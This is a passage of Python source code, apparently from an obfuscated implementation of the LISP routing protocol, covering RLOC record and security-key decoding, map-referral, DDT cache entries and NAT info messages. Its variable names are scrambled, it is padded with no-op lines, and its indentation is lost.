if 59 - 59: i11iIiiIii - I11i * Oo0Ooo % o0oOOo0O0Ooo + i1IIi
IiiiII = socket . ntohs ( IiiiII )
if ( IiiiII == LISP_AFI_LCAF ) : return ( None )
if 30 - 30: ooOoO0o / iII111i
IiioOoo = lisp_rle_node ( )
iI1Ii11 . rle_nodes . append ( IiioOoo )
if 66 - 66: ooOoO0o / IiII * iIii1I11I1II1
IiioOoo . level = oOOoOoooOo0o
IiioOoo . address . afi = IiiiII
IiioOoo . address . mask_len = IiioOoo . address . host_mask_len ( )
packet = IiioOoo . address . unpack_address ( packet [ 6 : : ] )
if 42 - 42: I1Ii111 - i11iIiiIii % II111iiii * ooOoO0o . O0 % I11i
iII -= IiioOoo . address . addr_length ( ) + 6
if ( iII >= 2 ) :
IiiiII = struct . unpack ( "H" , packet [ : 2 ] ) [ 0 ]
if ( socket . ntohs ( IiiiII ) == LISP_AFI_NAME ) :
packet = packet [ 2 : : ]
packet , IiioOoo . rloc_name = lisp_decode_dist_name ( packet )
if 82 - 82: Oo0Ooo % O0 + I1ii11iIi11i % I1ii11iIi11i
if ( packet == None ) : return ( None )
iII -= len ( IiioOoo . rloc_name ) + 1 + 2
if 74 - 74: O0 * IiII . I11i - I1Ii111 + O0 + I11i
if 48 - 48: oO0o . o0oOOo0O0Ooo - OOooOOo
if 29 - 29: Oo0Ooo - Ii1I - Oo0Ooo
self . rle = iI1Ii11
self . rle . build_forwarding_list ( )
if 89 - 89: Oo0Ooo . OoO0O00 . I1ii11iIi11i * oO0o . O0
elif ( OOOoooO000O0 == LISP_LCAF_SECURITY_TYPE ) :
if 72 - 72: i11iIiiIii % I11i / I1Ii111 + I1IiiI * iII111i
if 69 - 69: I1Ii111 + O0 . IiII . o0oOOo0O0Ooo
if 38 - 38: IiII / i1IIi
if 60 - 60: OoOoOO00
if 75 - 75: II111iiii / iIii1I11I1II1 / OoooooooOO
oO0ooOoOooO00o00 = packet
I1 = lisp_keys ( 1 )
packet = I1 . decode_lcaf ( oO0ooOoOooO00o00 , iII , False )
if ( packet == None ) : return ( None )
if 61 - 61: IiII . IiII
if 17 - 17: OoOoOO00 % Oo0Ooo / I1Ii111 . Ii1I % OoO0O00
if 32 - 32: I1IiiI + ooOoO0o / O0 * i11iIiiIii % Oo0Ooo + II111iiii
if 95 - 95: iII111i / ooOoO0o + I1Ii111
o0OOoOoo = [ LISP_CS_25519_CBC , LISP_CS_25519_CHACHA ]
if ( I1 . cipher_suite in o0OOoOoo ) :
if ( I1 . cipher_suite == LISP_CS_25519_CBC ) :
o0Oo = lisp_keys ( 1 , do_poly = False , do_chacha = False )
if 78 - 78: iIii1I11I1II1 / I1IiiI - IiII
if ( I1 . cipher_suite == LISP_CS_25519_CHACHA ) :
o0Oo = lisp_keys ( 1 , do_poly = True , do_chacha = True )
if 81 - 81: I1ii11iIi11i
else :
o0Oo = lisp_keys ( 1 , do_poly = False , do_chacha = False )
if 31 - 31: O0 % ooOoO0o / I1IiiI * iII111i % iIii1I11I1II1 * OoOoOO00
packet = o0Oo . decode_lcaf ( oO0ooOoOooO00o00 , iII , False )
if ( packet == None ) : return ( None )
if 76 - 76: I1Ii111 - O0
if ( len ( packet ) < 2 ) : return ( None )
IiiiII = struct . unpack ( "H" , packet [ : 2 ] ) [ 0 ]
self . rloc . afi = socket . ntohs ( IiiiII )
if ( len ( packet ) < self . rloc . addr_length ( ) ) : return ( None )
packet = self . rloc . unpack_address ( packet [ 2 : : ] )
if ( packet == None ) : return ( None )
self . rloc . mask_len = self . rloc . host_mask_len ( )
if 23 - 23: O0 * Ii1I * ooOoO0o % ooOoO0o
if 7 - 7: II111iiii + I11i
if 99 - 99: iIii1I11I1II1 * oO0o
if 37 - 37: ooOoO0o * iII111i * I11i
if 11 - 11: I1IiiI
if 48 - 48: O0 . I11i
if ( self . rloc . is_null ( ) ) : return ( packet )
if 9 - 9: oO0o / Oo0Ooo
Ooooo = self . rloc_name
if ( Ooooo ) : Ooooo = blue ( self . rloc_name , False )
if 45 - 45: I11i
if 90 - 90: OoO0O00 * I1IiiI - I1IiiI % OoO0O00
if 84 - 84: I1IiiI % I1IiiI * Ii1I
if 75 - 75: iIii1I11I1II1 - I1Ii111
if 86 - 86: O0 + O0 / I11i - iIii1I11I1II1
if 42 - 42: OOooOOo
Ii11i = self . keys [ 1 ] if self . keys else None
if ( Ii11i == None ) :
if ( o0Oo . remote_public_key == None ) :
O0ooo = bold ( "No remote encap-public-key supplied" , False )
lprint ( " {} for {}" . format ( O0ooo , Ooooo ) )
o0Oo = None
else :
O0ooo = bold ( "New encap-keying with new state" , False )
lprint ( " {} for {}" . format ( O0ooo , Ooooo ) )
o0Oo . compute_shared_key ( "encap" )
if 39 - 39: O0 % Ii1I . I11i * o0oOOo0O0Ooo
if 14 - 14: I11i . iIii1I11I1II1 + I1Ii111 % OoooooooOO
if 9 - 9: oO0o + Ii1I / I1ii11iIi11i * iIii1I11I1II1 + o0oOOo0O0Ooo
if 64 - 64: I11i % i11iIiiIii % I1ii11iIi11i
if 14 - 14: I1Ii111 - OoOoOO00 - I1ii11iIi11i % I11i + OoooooooOO
if 4 - 4: I1Ii111 - I1IiiI / iIii1I11I1II1 + I1ii11iIi11i % iIii1I11I1II1 * I1IiiI
if 30 - 30: i11iIiiIii % OOooOOo
if 52 - 52: I11i - oO0o . i11iIiiIii - II111iiii + Ii1I . iII111i
if 27 - 27: I1IiiI + OoOoOO00 + iII111i
if 70 - 70: I11i + IiII . ooOoO0o - I1ii11iIi11i
if ( Ii11i ) :
if ( o0Oo . remote_public_key == None ) :
o0Oo = None
o0OOo = bold ( "Remote encap-unkeying occurred" , False )
lprint ( " {} for {}" . format ( o0OOo , Ooooo ) )
elif ( Ii11i . compare_keys ( o0Oo ) ) :
o0Oo = Ii11i
lprint ( " Maintain stored encap-keys for {}" . format ( Ooooo ) )
if 34 - 34: i1IIi % Oo0Ooo . oO0o
else :
if ( Ii11i . remote_public_key == None ) :
O0ooo = "New encap-keying for existing state"
else :
O0ooo = "Remote encap-rekeying"
if 36 - 36: I1ii11iIi11i / I1Ii111 - IiII + OOooOOo + I1Ii111
lprint ( " {} for {}" . format ( bold ( O0ooo , False ) ,
Ooooo ) )
Ii11i . remote_public_key = o0Oo . remote_public_key
Ii11i . compute_shared_key ( "encap" )
o0Oo = Ii11i
if 62 - 62: Oo0Ooo . OoO0O00 * I1Ii111 . i11iIiiIii * O0
if 10 - 10: Oo0Ooo / OoOoOO00 * OOooOOo - IiII + Ii1I
self . keys = [ None , o0Oo , None , None ]
if 62 - 62: I1IiiI . Ii1I
else :
if 74 - 74: Ii1I - I11i % ooOoO0o - I1IiiI - Ii1I - II111iiii
if 81 - 81: i1IIi * I1ii11iIi11i + IiII - OoO0O00 * i1IIi
if 6 - 6: iIii1I11I1II1 % OoOoOO00 % II111iiii % o0oOOo0O0Ooo
if 52 - 52: Ii1I - I1IiiI * iIii1I11I1II1 % Oo0Ooo * OOooOOo
packet = packet [ iII : : ]
if 67 - 67: OoooooooOO * I11i * Ii1I * iIii1I11I1II1
return ( packet )
if 22 - 22: OoO0O00 / o0oOOo0O0Ooo
if 35 - 35: I1Ii111 / I1Ii111 + o0oOOo0O0Ooo - oO0o
def decode ( self , packet , nonce , ms_json_encrypt = False ) :
O0O00Oo = "BBBBHH"
IiIii1i = struct . calcsize ( O0O00Oo )
if ( len ( packet ) < IiIii1i ) : return ( None )
if 40 - 40: OoOoOO00 - II111iiii
self . priority , self . weight , self . mpriority , self . mweight , O0OooO00O0 , IiiiII = struct . unpack ( O0O00Oo , packet [ : IiIii1i ] )
if 29 - 29: I1IiiI - O0
if 36 - 36: I1IiiI * I1IiiI
O0OooO00O0 = socket . ntohs ( O0OooO00O0 )
IiiiII = socket . ntohs ( IiiiII )
self . local_bit = True if ( O0OooO00O0 & 0x0004 ) else False
self . probe_bit = True if ( O0OooO00O0 & 0x0002 ) else False
self . reach_bit = True if ( O0OooO00O0 & 0x0001 ) else False
if 79 - 79: I1Ii111 - I11i
if ( IiiiII == LISP_AFI_LCAF ) :
packet = packet [ IiIii1i - 2 : : ]
packet = self . decode_lcaf ( packet , nonce , ms_json_encrypt )
else :
self . rloc . afi = IiiiII
packet = packet [ IiIii1i : : ]
packet = self . rloc . unpack_address ( packet )
if 49 - 49: II111iiii + O0 * ooOoO0o - Oo0Ooo
self . rloc . mask_len = self . rloc . host_mask_len ( )
return ( packet )
if 89 - 89: I1IiiI + I11i . oO0o . II111iiii + oO0o / Oo0Ooo
if 32 - 32: OoO0O00 % oO0o * I1ii11iIi11i + I11i / I1Ii111
def end_of_rlocs ( self , packet , rloc_count ) :
for iIi1I1 in range ( rloc_count ) :
packet = self . decode ( packet , None , False )
if ( packet == None ) : return ( None )
if 5 - 5: o0oOOo0O0Ooo + iII111i / OoooooooOO + Ii1I . OoOoOO00 / oO0o
return ( packet )
if 18 - 18: II111iiii . o0oOOo0O0Ooo
if 75 - 75: OoooooooOO - Oo0Ooo
if 56 - 56: II111iiii - i11iIiiIii - oO0o . o0oOOo0O0Ooo
if 4 - 4: i1IIi
if 91 - 91: IiII . OoO0O00 * Ii1I / o0oOOo0O0Ooo
if 41 - 41: I1IiiI . OoO0O00 / i1IIi . Oo0Ooo . oO0o
if 44 - 44: iII111i * I11i + i11iIiiIii + i1IIi / IiII * II111iiii
if 58 - 58: OOooOOo
if 72 - 72: OoO0O00 + OOooOOo - Oo0Ooo % ooOoO0o . IiII
if 95 - 95: iII111i % OOooOOo - IiII - OoOoOO00 % o0oOOo0O0Ooo * O0
if 16 - 16: I1Ii111 / Oo0Ooo
if 48 - 48: Oo0Ooo / oO0o + iII111i % iII111i
if 9 - 9: I1ii11iIi11i - o0oOOo0O0Ooo . Oo0Ooo + I1ii11iIi11i . OOooOOo
if 30 - 30: OoooooooOO - iIii1I11I1II1 / oO0o * Ii1I / Ii1I
if 52 - 52: OoOoOO00 - OoO0O00 + I1IiiI + IiII
if 49 - 49: oO0o / I11i - oO0o
if 31 - 31: OoOoOO00 + I1IiiI + I1ii11iIi11i + I11i * II111iiii % oO0o
if 90 - 90: OOooOOo * iIii1I11I1II1 / i1IIi
if 60 - 60: OOooOOo * I1Ii111 . oO0o
if 47 - 47: oO0o % OOooOOo / OOooOOo % OoOoOO00 % I1Ii111 / OoOoOO00
if 51 - 51: I1IiiI . I11i - OoOoOO00
if 10 - 10: Oo0Ooo * OOooOOo / IiII . o0oOOo0O0Ooo
if 97 - 97: Ii1I . Ii1I % iII111i
if 49 - 49: Oo0Ooo % OOooOOo - OoooooooOO + IiII
if 54 - 54: iIii1I11I1II1 - OoooooooOO / I11i / oO0o % I1IiiI + OoOoOO00
if 26 - 26: OoO0O00 * II111iiii % OOooOOo * iII111i + iII111i
if 25 - 25: I11i - I1ii11iIi11i
if 100 - 100: I1Ii111 / Ii1I + OoOoOO00 . OoooooooOO
if 83 - 83: O0
if 35 - 35: i11iIiiIii - I11i . OoOoOO00 * II111iiii % i11iIiiIii
class lisp_map_referral ( ) :
def __init__ ( self ) :
self . record_count = 0
self . nonce = 0
if 55 - 55: o0oOOo0O0Ooo / O0 / OoooooooOO * Oo0Ooo % iII111i
if 24 - 24: I1ii11iIi11i % OOooOOo + OoooooooOO + OoO0O00
def print_map_referral ( self ) :
lprint ( "{} -> record-count: {}, nonce: 0x{}" . format ( bold ( "Map-Referral" , False ) , self . record_count ,
# OOooOOo + o0oOOo0O0Ooo + OoOoOO00 + iIii1I11I1II1 + II111iiii - O0
lisp_hex_string ( self . nonce ) ) )
if 22 - 22: Ii1I % O0 - oO0o / I1IiiI * OoOoOO00
if 31 - 31: IiII + I1IiiI * I11i % OoO0O00
def encode ( self ) :
i1OOoO0OO0oO = ( LISP_MAP_REFERRAL << 28 ) | self . record_count
IiiiIi1iiii11 = struct . pack ( "I" , socket . htonl ( i1OOoO0OO0oO ) )
IiiiIi1iiii11 += struct . pack ( "Q" , self . nonce )
return ( IiiiIi1iiii11 )
if 77 - 77: II111iiii * OoooooooOO * ooOoO0o % OOooOOo % OOooOOo * i1IIi
if 37 - 37: I1ii11iIi11i * iII111i . ooOoO0o - I1IiiI
def decode ( self , packet ) :
O0O00Oo = "I"
IiIii1i = struct . calcsize ( O0O00Oo )
if ( len ( packet ) < IiIii1i ) : return ( None )
if 95 - 95: I11i / I1Ii111 % Ii1I % o0oOOo0O0Ooo . Ii1I
i1OOoO0OO0oO = struct . unpack ( O0O00Oo , packet [ : IiIii1i ] )
i1OOoO0OO0oO = socket . ntohl ( i1OOoO0OO0oO [ 0 ] )
self . record_count = i1OOoO0OO0oO & 0xff
packet = packet [ IiIii1i : : ]
if 40 - 40: iII111i . ooOoO0o % OoooooooOO % OOooOOo / OoooooooOO / Oo0Ooo
O0O00Oo = "Q"
IiIii1i = struct . calcsize ( O0O00Oo )
if ( len ( packet ) < IiIii1i ) : return ( None )
if 93 - 93: o0oOOo0O0Ooo % iIii1I11I1II1 % oO0o / I1IiiI
self . nonce = struct . unpack ( O0O00Oo , packet [ : IiIii1i ] ) [ 0 ]
packet = packet [ IiIii1i : : ]
return ( packet )
if 98 - 98: II111iiii + Oo0Ooo - i1IIi + iII111i + II111iiii
if 93 - 93: O0
if 78 - 78: I1Ii111 * i1IIi + OoooooooOO * ooOoO0o
if 69 - 69: i1IIi
if 83 - 83: I1ii11iIi11i . ooOoO0o + I1IiiI + O0
if 78 - 78: O0 + Oo0Ooo
if 14 - 14: O0
if 67 - 67: II111iiii / O0
class lisp_ddt_entry ( ) :
def __init__ ( self ) :
self . eid = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . group = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . uptime = lisp_get_timestamp ( )
self . delegation_set = [ ]
self . source_cache = None
self . map_referrals_sent = 0
if 10 - 10: i1IIi / Oo0Ooo
if 20 - 20: Oo0Ooo * I1Ii111 / I1ii11iIi11i . ooOoO0o
def is_auth_prefix ( self ) :
if ( len ( self . delegation_set ) != 0 ) : return ( False )
if ( self . is_star_g ( ) ) : return ( False )
return ( True )
if 67 - 67: o0oOOo0O0Ooo . Oo0Ooo % I11i
if 38 - 38: OOooOOo - OoO0O00 . ooOoO0o
def is_ms_peer_entry ( self ) :
if ( len ( self . delegation_set ) == 0 ) : return ( False )
return ( self . delegation_set [ 0 ] . is_ms_peer ( ) )
if 50 - 50: o0oOOo0O0Ooo
if 85 - 85: II111iiii . iII111i - i1IIi
def print_referral_type ( self ) :
if ( len ( self . delegation_set ) == 0 ) : return ( "unknown" )
I1I = self . delegation_set [ 0 ]
return ( I1I . print_node_type ( ) )
if 80 - 80: II111iiii + I1ii11iIi11i
if 9 - 9: I11i
def print_eid_tuple ( self ) :
return ( lisp_print_eid_tuple ( self . eid , self . group ) )
if 69 - 69: Oo0Ooo % I1Ii111
if 80 - 80: I11i * oO0o % iIii1I11I1II1 / iII111i
def add_cache ( self ) :
if ( self . group . is_null ( ) ) :
lisp_ddt_cache . add_cache ( self . eid , self )
else :
O0oo0OoOO = lisp_ddt_cache . lookup_cache ( self . group , True )
if ( O0oo0OoOO == None ) :
O0oo0OoOO = lisp_ddt_entry ( )
O0oo0OoOO . eid . copy_address ( self . group )
O0oo0OoOO . group . copy_address ( self . group )
lisp_ddt_cache . add_cache ( self . group , O0oo0OoOO )
if 58 - 58: II111iiii . I1IiiI . i1IIi
if ( self . eid . is_null ( ) ) : self . eid . make_default_route ( O0oo0OoOO . group )
O0oo0OoOO . add_source_entry ( self )
if 60 - 60: iIii1I11I1II1 + ooOoO0o * i11iIiiIii + OoooooooOO
if 43 - 43: I1ii11iIi11i % Oo0Ooo - i11iIiiIii / I1Ii111 * i1IIi
if 78 - 78: o0oOOo0O0Ooo / OOooOOo / oO0o
def add_source_entry ( self , source_ddt ) :
if ( self . source_cache == None ) : self . source_cache = lisp_cache ( )
self . source_cache . add_cache ( source_ddt . eid , source_ddt )
if 9 - 9: IiII + O0 / I1IiiI
if 92 - 92: OOooOOo / i11iIiiIii + OoooooooOO
def lookup_source_cache ( self , source , exact ) :
if ( self . source_cache == None ) : return ( None )
return ( self . source_cache . lookup_cache ( source , exact ) )
if 9 - 9: iII111i
if 9 - 9: O0 / o0oOOo0O0Ooo / I11i - i11iIiiIii - iII111i / IiII
def is_star_g ( self ) :
if ( self . group . is_null ( ) ) : return ( False )
return ( self . eid . is_exact_match ( self . group ) )
if 46 - 46: IiII + OoooooooOO % I1IiiI
if 51 - 51: I1IiiI * I1Ii111 . i11iIiiIii % Oo0Ooo . i1IIi - oO0o
if 56 - 56: Oo0Ooo / II111iiii
class lisp_ddt_node ( ) :
def __init__ ( self ) :
self . delegate_address = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . public_key = ""
self . map_server_peer = False
self . map_server_child = False
self . priority = 0
self . weight = 0
if 76 - 76: OoOoOO00 % OoO0O00 * O0
if 39 - 39: ooOoO0o / iII111i
def print_node_type ( self ) :
if ( self . is_ddt_child ( ) ) : return ( "ddt-child" )
if ( self . is_ms_child ( ) ) : return ( "map-server-child" )
if ( self . is_ms_peer ( ) ) : return ( "map-server-peer" )
if 94 - 94: oO0o + iII111i * OoOoOO00 - i1IIi / OoooooooOO
if 59 - 59: I11i % Ii1I / OoOoOO00
def is_ddt_child ( self ) :
if ( self . map_server_child ) : return ( False )
if ( self . map_server_peer ) : return ( False )
return ( True )
if 99 - 99: Ii1I + II111iiii / i11iIiiIii - IiII / iII111i + iII111i
if 55 - 55: IiII + OoooooooOO * I1ii11iIi11i . IiII * I1ii11iIi11i + IiII
def is_ms_child ( self ) :
return ( self . map_server_child )
if 81 - 81: iIii1I11I1II1 . ooOoO0o + OoOoOO00
if 31 - 31: I11i / OoOoOO00 + o0oOOo0O0Ooo
def is_ms_peer ( self ) :
return ( self . map_server_peer )
if 80 - 80: Oo0Ooo
if 58 - 58: I1Ii111 + OOooOOo
if 76 - 76: II111iiii - o0oOOo0O0Ooo % OoO0O00 + iII111i
if 38 - 38: I1Ii111 - I11i * i1IIi + iIii1I11I1II1
if 41 - 41: Ii1I . OoO0O00 + I1ii11iIi11i + OoOoOO00
if 76 - 76: iII111i - iIii1I11I1II1
if 23 - 23: I11i / OoO0O00 % OOooOOo
class lisp_ddt_map_request ( ) :
def __init__ ( self , lisp_sockets , packet , eid , group , nonce ) :
self . uptime = lisp_get_timestamp ( )
self . lisp_sockets = lisp_sockets
self . packet = packet
self . eid = eid
self . group = group
self . nonce = nonce
self . mr_source = None
self . sport = 0
self . itr = None
self . retry_count = 0
self . send_count = 0
self . retransmit_timer = None
self . last_request_sent_to = None
self . from_pitr = False
self . tried_root = False
self . last_cached_prefix = [ None , None ]
if 9 - 9: ooOoO0o % I1ii11iIi11i . OoooooooOO + OoO0O00 % OOooOOo * OoooooooOO
if 21 - 21: Ii1I % O0
def print_ddt_map_request ( self ) :
lprint ( "Queued Map-Request from {}ITR {}->{}, nonce 0x{}" . format ( "P" if self . from_pitr else "" ,
# oO0o
red ( self . itr . print_address ( ) , False ) ,
green ( self . eid . print_address ( ) , False ) , self . nonce ) )
if 93 - 93: Ii1I + iII111i
if 89 - 89: Oo0Ooo * II111iiii * I1Ii111 / I1IiiI + I1IiiI . o0oOOo0O0Ooo
def queue_map_request ( self ) :
self . retransmit_timer = threading . Timer ( LISP_DDT_MAP_REQUEST_INTERVAL ,
lisp_retransmit_ddt_map_request , [ self ] )
self . retransmit_timer . start ( )
lisp_ddt_map_requestQ [ str ( self . nonce ) ] = self
if 40 - 40: O0 - i1IIi - i11iIiiIii % IiII % II111iiii
if 54 - 54: o0oOOo0O0Ooo + I1IiiI % ooOoO0o . Ii1I - o0oOOo0O0Ooo
def dequeue_map_request ( self ) :
self . retransmit_timer . cancel ( )
if ( lisp_ddt_map_requestQ . has_key ( str ( self . nonce ) ) ) :
lisp_ddt_map_requestQ . pop ( str ( self . nonce ) )
if 1 - 1: I1IiiI + iIii1I11I1II1
if 81 - 81: OoO0O00 * ooOoO0o
if 98 - 98: OoOoOO00 % ooOoO0o * I1ii11iIi11i
def print_eid_tuple ( self ) :
return ( lisp_print_eid_tuple ( self . eid , self . group ) )
if 64 - 64: OOooOOo + I11i . ooOoO0o
if 17 - 17: OoOoOO00 . I1Ii111
if 10 - 10: I1ii11iIi11i * I1Ii111 * Ii1I * o0oOOo0O0Ooo - o0oOOo0O0Ooo + OoOoOO00
if 92 - 92: Ii1I / iII111i . I1ii11iIi11i % Ii1I
if 18 - 18: OOooOOo + I1IiiI + i1IIi + o0oOOo0O0Ooo % o0oOOo0O0Ooo
if 48 - 48: O0
if 5 - 5: OOooOOo / i11iIiiIii . I11i % OOooOOo
if 1 - 1: II111iiii + O0 * OoOoOO00 / IiII . O0
if 87 - 87: IiII + I1IiiI
if 74 - 74: OoO0O00 + OoO0O00 % iII111i / I11i / O0
if 54 - 54: o0oOOo0O0Ooo / OoooooooOO * ooOoO0o . OoOoOO00 - I1Ii111
if 69 - 69: oO0o - OoO0O00
if 80 - 80: ooOoO0o + iIii1I11I1II1 . II111iiii + I1IiiI - oO0o % OoOoOO00
if 10 - 10: iIii1I11I1II1
if 44 - 44: OoOoOO00 * oO0o . I1ii11iIi11i + i11iIiiIii
if 85 - 85: I11i
if 36 - 36: ooOoO0o % OoO0O00
if 1 - 1: OoooooooOO - OoOoOO00
if 35 - 35: I1Ii111
if 35 - 35: Oo0Ooo - iIii1I11I1II1 / i1IIi + OoO0O00 - OoooooooOO / i11iIiiIii
LISP_DDT_ACTION_SITE_NOT_FOUND = - 2
LISP_DDT_ACTION_NULL = - 1
LISP_DDT_ACTION_NODE_REFERRAL = 0
LISP_DDT_ACTION_MS_REFERRAL = 1
LISP_DDT_ACTION_MS_ACK = 2
LISP_DDT_ACTION_MS_NOT_REG = 3
LISP_DDT_ACTION_DELEGATION_HOLE = 4
LISP_DDT_ACTION_NOT_AUTH = 5
LISP_DDT_ACTION_MAX = LISP_DDT_ACTION_NOT_AUTH
if 79 - 79: I1IiiI * ooOoO0o * ooOoO0o
lisp_map_referral_action_string = [
"node-referral" , "ms-referral" , "ms-ack" , "ms-not-registered" ,
"delegation-hole" , "not-authoritative" ]
if 92 - 92: iII111i % I1ii11iIi11i
if 16 - 16: oO0o
if 52 - 52: OoooooooOO % ooOoO0o - I1Ii111 * I11i
if 24 - 24: Ii1I + IiII + OoooooooOO / oO0o / I1IiiI + IiII
if 52 - 52: ooOoO0o
if 38 - 38: OoO0O00 + I1IiiI % IiII
if 87 - 87: oO0o * Ii1I - I1Ii111 / oO0o
if 65 - 65: OoOoOO00
if 87 - 87: I11i - i11iIiiIii - OOooOOo . OoOoOO00 + IiII . OoO0O00
if 70 - 70: iIii1I11I1II1 % OoooooooOO / OoO0O00 . O0 - I11i % II111iiii
if 84 - 84: OOooOOo * i1IIi . iIii1I11I1II1 * iII111i + I1Ii111 + II111iiii
if 97 - 97: Ii1I - IiII
if 64 - 64: oO0o . ooOoO0o / ooOoO0o - II111iiii
if 81 - 81: I1ii11iIi11i
if 64 - 64: oO0o * OoO0O00 / OOooOOo + Ii1I % Oo0Ooo . IiII
if 2 - 2: I1Ii111 + I11i
if 47 - 47: i11iIiiIii + iIii1I11I1II1 % I1ii11iIi11i - oO0o % OoO0O00
if 85 - 85: oO0o * OoOoOO00 / OoOoOO00
if 85 - 85: OOooOOo / I1Ii111 . i1IIi / OoOoOO00 + iIii1I11I1II1
if 71 - 71: OoO0O00
if 96 - 96: I1ii11iIi11i / I1IiiI - I1ii11iIi11i / II111iiii - IiII
if 74 - 74: Ii1I * OoooooooOO % OOooOOo + OoooooooOO + iII111i
if 83 - 83: i1IIi
if 2 - 2: i1IIi / OOooOOo * O0
if 99 - 99: OoooooooOO . OoOoOO00 / II111iiii
if 64 - 64: iII111i / i1IIi . I1IiiI + O0
if 5 - 5: O0 . i11iIiiIii
if 71 - 71: o0oOOo0O0Ooo + iII111i + ooOoO0o
if 27 - 27: OoooooooOO . iII111i * I1Ii111 % O0 + OoooooooOO - iII111i
if 86 - 86: i1IIi
if 81 - 81: OoOoOO00
if 52 - 52: iII111i * IiII % I1IiiI * I11i
if 73 - 73: I1Ii111 * ooOoO0o
if 62 - 62: OOooOOo . I1IiiI * iIii1I11I1II1 + OoO0O00 * ooOoO0o / oO0o
if 14 - 14: iII111i / OoO0O00
if 75 - 75: IiII
if 68 - 68: IiII - i1IIi % IiII . OoO0O00 . i11iIiiIii . OoooooooOO
if 32 - 32: iII111i + OoO0O00 % IiII + I1IiiI
if 69 - 69: I1Ii111 + I11i - iIii1I11I1II1 - II111iiii . Ii1I
if 74 - 74: I1ii11iIi11i % o0oOOo0O0Ooo + O0 - i11iIiiIii - IiII % OOooOOo
if 39 - 39: OoO0O00 - o0oOOo0O0Ooo
if 71 - 71: iII111i . OoO0O00 + ooOoO0o - OOooOOo - Oo0Ooo
if 100 - 100: OoooooooOO - o0oOOo0O0Ooo + I1Ii111 . OoooooooOO % i11iIiiIii
if 64 - 64: I1Ii111 % OoooooooOO / i1IIi / OoO0O00
if 2 - 2: I11i % o0oOOo0O0Ooo . OoO0O00 . OoO0O00
if 89 - 89: ooOoO0o - oO0o + II111iiii + OoO0O00 - IiII
if 27 - 27: I1Ii111 - o0oOOo0O0Ooo + OoO0O00
if 38 - 38: OoOoOO00 + OoO0O00 . i11iIiiIii + Ii1I % i1IIi % I1IiiI
if 93 - 93: i11iIiiIii
if 63 - 63: iIii1I11I1II1 - iIii1I11I1II1 % o0oOOo0O0Ooo
if 97 - 97: i1IIi % I11i % OoOoOO00
if 25 - 25: OoOoOO00 . iIii1I11I1II1 - iII111i % II111iiii . OoOoOO00
if 16 - 16: OOooOOo . Oo0Ooo . I1IiiI % O0 . I1ii11iIi11i + i11iIiiIii
if 100 - 100: I1ii11iIi11i - i1IIi - OoO0O00 * o0oOOo0O0Ooo + OoOoOO00
if 31 - 31: i1IIi
if 21 - 21: o0oOOo0O0Ooo / O0 % O0 . OoooooooOO / I1IiiI
if 94 - 94: ooOoO0o + OoO0O00 / ooOoO0o - ooOoO0o + Oo0Ooo + o0oOOo0O0Ooo
if 50 - 50: oO0o . Oo0Ooo
if 15 - 15: Ii1I
class lisp_info ( ) :
def __init__ ( self ) :
self . info_reply = False
self . nonce = 0
self . private_etr_rloc = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . global_etr_rloc = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . global_ms_rloc = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . ms_port = 0
self . etr_port = 0
self . rtr_list = [ ]
self . hostname = lisp_hostname
if 64 - 64: OoooooooOO
if 25 - 25: IiII
def print_info ( self ) :
if ( self . info_reply ) :
iI11iiIIii = "Info-Reply"
I1II = ( ", ms-port: {}, etr-port: {}, global-rloc: {}, " + "ms-rloc: {}, private-rloc: {}, RTR-list: " ) . format ( self . ms_port , self . etr_port ,
# OoooooooOO * IiII * O0 . i11iIiiIii + iIii1I11I1II1 - OoooooooOO
# I1ii11iIi11i + OoOoOO00 % I1ii11iIi11i - Oo0Ooo
red ( self . global_etr_rloc . print_address_no_iid ( ) , False ) ,
red ( self . global_ms_rloc . print_address_no_iid ( ) , False ) ,
red ( self . private_etr_rloc . print_address_no_iid ( ) , False ) )
if ( len ( self . rtr_list ) == 0 ) : I1II += "empty, "
for iIi in self . rtr_list :
I1II += red ( iIi . print_address_no_iid ( ) , False ) + ", "
if 56 - 56: I1IiiI * iIii1I11I1II1 . II111iiii % II111iiii - o0oOOo0O0Ooo
I1II = I1II [ 0 : - 2 ]
else :
iI11iiIIii = "Info-Request"
IIIi = "<none>" if self . hostname == None else self . hostname
I1II = ", hostname: {}" . format ( blue ( IIIi , False ) )
if 5 - 5: IiII * i11iIiiIii * OOooOOo . iII111i - Ii1I * oO0o
lprint ( "{} -> nonce: 0x{}{}" . format ( bold ( iI11iiIIii , False ) ,
lisp_hex_string ( self . nonce ) , I1II ) )
if 25 - 25: O0 . I1Ii111 / IiII % I1ii11iIi11i
if 75 - 75: iII111i % I11i - Oo0Ooo * I1ii11iIi11i - IiII
def encode ( self ) :
i1OOoO0OO0oO = ( LISP_NAT_INFO << 28 )
if ( self . info_reply ) : i1OOoO0OO0oO |= ( 1 << 27 )
if 73 - 73: Ii1I - ooOoO0o / i1IIi
if 8 - 8: Ii1I
if 52 - 52: IiII
if 86 - 86: I1Ii111 / O0 + OoooooooOO % oO0o
if 45 - 45: I1IiiI . Oo0Ooo . I11i . Ii1I
if 81 - 81: II111iiii + OoOoOO00 % i11iIiiIii / iII111i . I1Ii111 + II111iiii
if 48 - 48: I1IiiI . I1ii11iIi11i * OoOoOO00 % i1IIi / I1Ii111 * II111iiii
IiiiIi1iiii11 = struct . pack ( "I" , socket . htonl ( i1OOoO0OO0oO ) )
IiiiIi1iiii11 += struct . pack ( "Q" , self . nonce )
IiiiIi1iiii11 += struct . pack ( "III" , 0 , 0 , 0 )
if 62 - 62: o0oOOo0O0Ooo * I1Ii111 . iIii1I11I1II1 / i1IIi
if 75 - 75: OoooooooOO / ooOoO0o - iII111i . OoooooooOO . OoOoOO00 % i1IIi
if 7 - 7: OoOoOO00 . i1IIi * i11iIiiIii % i11iIiiIii
if 54 - 54: OoO0O00 / I1IiiI . Oo0Ooo
if ( self . info_reply == False ) :
if ( self . hostname == None ) :
IiiiIi1iiii11 += struct . pack ( "H" , 0 )
else :
IiiiIi1iiii11 += struct . pack ( "H" , socket . htons ( LISP_AFI_NAME ) )
IiiiIi1iiii11 += self . hostname + "\0"
if 39 - 39: OoO0O00 . ooOoO0o
return ( IiiiIi1iiii11 )
if 41 - 41: Oo0Ooo * I1ii11iIi11i - II111iiii - II111iiii
if 7 - 7: oO0o
